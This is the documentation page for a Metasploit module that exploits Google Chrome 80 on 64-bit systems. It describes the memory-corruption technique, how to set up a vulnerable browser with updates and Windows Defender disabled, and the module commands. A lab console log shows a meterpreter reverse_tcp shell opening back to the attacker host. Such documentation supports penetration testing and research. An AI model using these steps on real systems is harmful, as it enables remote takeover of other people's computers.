dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md

3.2 KiB
Raw Permalink Blame History

This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.

The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.

Vulnerable Application

The module is compatible with any 64bit Google Chrome (version 80), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.

Vulnerable Application Installation Steps

You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/

You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.

Verification Steps

  1. Do: use exploit/multi/browser/chrome_jscreate_sideeffect
  2. Do: set payload windows/x64/meterpreter/reverse_tcp
  3. Do: set LHOST [IP]
  4. Do: set SRVHOST [IP]
  5. Do: set URIPATH / [PATH]
  6. Do: run

Scenarios

Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox

Start Google Chrome without a sandbox:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox

msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
URIPATH => /
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
[*] 192.168.56.3     chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800

msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
meterpreter >